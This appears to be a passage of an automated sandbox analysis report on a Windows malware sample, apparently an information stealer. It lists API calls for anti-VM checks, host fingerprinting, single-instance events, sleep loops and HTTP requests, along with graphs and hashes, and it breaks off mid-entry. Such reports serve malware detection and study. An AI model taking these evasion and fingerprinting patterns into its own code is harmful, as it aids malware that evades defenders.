1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                  APIs
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3630751533-2791005934
                                  • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                  • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                  Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                  • wsprintfA.USER32 ref: 00417640
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 3790021787-3809124531
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                  Function 022E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1344 22e003c-22e0047 1345 22e004c-22e0263 call 22e0a3f call 22e0e0f call 22e0d90 VirtualAlloc 1344->1345 1346 22e0049 1344->1346 1361 22e028b-22e0292 1345->1361 1362 22e0265-22e0289 call 22e0a69 1345->1362 1346->1345 1364 22e02a1-22e02b0 1361->1364 1366 22e02ce-22e03c2 VirtualProtect call 22e0cce call 22e0ce7 1362->1366 1364->1366 1367 22e02b2-22e02cc 1364->1367 1373 22e03d1-22e03e0 1366->1373 1367->1364 1374 22e0439-22e04b8 VirtualFree 1373->1374 1375 22e03e2-22e0437 call 22e0ce7 1373->1375 1377 22e04be-22e04cd 1374->1377 1378 22e05f4-22e05fe 1374->1378 1375->1373 1380 22e04d3-22e04dd 1377->1380 1381 22e077f-22e0789 1378->1381 1382 22e0604-22e060d 1378->1382 1380->1378 1386 22e04e3-22e0505 LoadLibraryA 1380->1386 1384 22e078b-22e07a3 1381->1384 1385 22e07a6-22e07b0 1381->1385 1382->1381 1387 22e0613-22e0637 1382->1387 1384->1385 1388 22e086e-22e08be LoadLibraryA 1385->1388 1389 22e07b6-22e07cb 1385->1389 1390 22e0517-22e0520 1386->1390 1391 22e0507-22e0515 1386->1391 1392 22e063e-22e0648 1387->1392 1396 22e08c7-22e08f9 1388->1396 1393 22e07d2-22e07d5 1389->1393 1394 22e0526-22e0547 1390->1394 1391->1394 1392->1381 1395 22e064e-22e065a 1392->1395 1397 22e07d7-22e07e0 1393->1397 1398 22e0824-22e0833 1393->1398 1399 22e054d-22e0550 1394->1399 1395->1381 1400 22e0660-22e066a 1395->1400 1402 22e08fb-22e0901 1396->1402 1403 22e0902-22e091d 1396->1403 1404 22e07e4-22e0822 1397->1404 1405 22e07e2 1397->1405 1401 22e0839-22e083c 1398->1401 1406 22e0556-22e056b 1399->1406 1407 22e05e0-22e05ef 1399->1407 1408 22e067a-22e0689 1400->1408 1401->1388 1409 22e083e-22e0847 1401->1409 1402->1403 1404->1393 1405->1398 1412 22e056f-22e057a 1406->1412 1413 22e056d 1406->1413 1407->1380 1410 22e068f-22e06b2 1408->1410 1411 22e0750-22e077a 1408->1411 1416 22e084b-22e086c 1409->1416 1417 22e0849 1409->1417 1418 22e06ef-22e06fc 1410->1418 1419 22e06b4-22e06ed 1410->1419 1411->1392 1414 22e057c-22e0599 1412->1414 1415 22e059b-22e05bb 1412->1415 1413->1407 1427 22e05bd-22e05db 1414->1427 1415->1427 1416->1401 1417->1388 1421 22e06fe-22e0748 1418->1421 1422 22e074b 1418->1422 1419->1418 1421->1422 1422->1408 1427->1399
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022E024D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: cess$kernel32.dll
                                  • API String ID: 4275171209-1230238691
                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction ID: bc7de75c7c9427a50a3ef4041c81cc4394aa9b353f4eb711bf1bfea546b9a28d
                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction Fuzzy Hash: 93527A74A10229DFDB64CF98C984BACBBB1BF09304F5480D9E50EAB355DB70AA85DF14
                                  Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587A0), ref: 004198A1
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587B8), ref: 004198BA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858860), ref: 004198D2
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008588A8), ref: 004198EA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587D0), ref: 00419903
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883690), ref: 0041991B
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00856478), ref: 00419933
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00856658), ref: 0041994C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858908), ref: 00419964
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858830), ref: 0041997C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883A98), ref: 00419995
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008838D0), ref: 004199AD
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008564F8), ref: 004199C5
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883AB0), ref: 004199DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 3511611419-0
                                  • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                  • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                  Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                  • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                  Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                  • __aulldiv.LIBCMT ref: 00401258
                                  • __aulldiv.LIBCMT ref: 00401266
                                  • ExitProcess.KERNEL32 ref: 00401294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                  Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                  Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                  • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                  Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocComputerNameProcess
                                  • String ID:
                                  • API String ID: 4203777966-0
                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                  Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                  • ExitProcess.KERNEL32 ref: 00401143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                  Function 0085AB26 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085AB4E
                                  • Module32First.KERNEL32(00000000,00000224), ref: 0085AB6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3833638111-0
                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction ID: fd8e93069650f555440fe197809b2a257a3bcf166fd63a617fca3d8088e53715
                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
